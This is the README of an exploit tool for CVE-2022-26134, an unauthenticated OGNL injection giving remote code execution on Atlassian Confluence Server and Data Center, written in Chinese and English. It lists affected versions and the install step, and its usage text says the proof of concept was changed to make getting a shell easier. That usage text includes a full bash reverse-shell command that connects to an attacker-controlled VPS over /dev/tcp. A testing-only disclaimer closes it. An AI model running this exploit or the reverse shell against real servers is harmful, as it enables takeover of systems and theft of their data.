远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,修改poc,方便getshell。常见端口:8090
- Confluence Server and Data Center >= 1.3.0
- 7.14.0 <= Confluence Server and Data Center < 7.4.17
- 7.13.0 <= Confluence Server and Data Center < 7.13.7
- 7.14.0 <= Confluence Server and Data Center < 7.14.3
- 7.15.0 <= Confluence Server and Data Center < 7.15.2
- 7.16.0 <= Confluence Server and Data Center < 7.16.4
- 7.17.0 <= Confluence Server and Data Center < 7.17.4
- 7.18.0 <= Confluence Server and Data Center < 7.18.1
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令此脚本仅可用于测试使用,勿作他用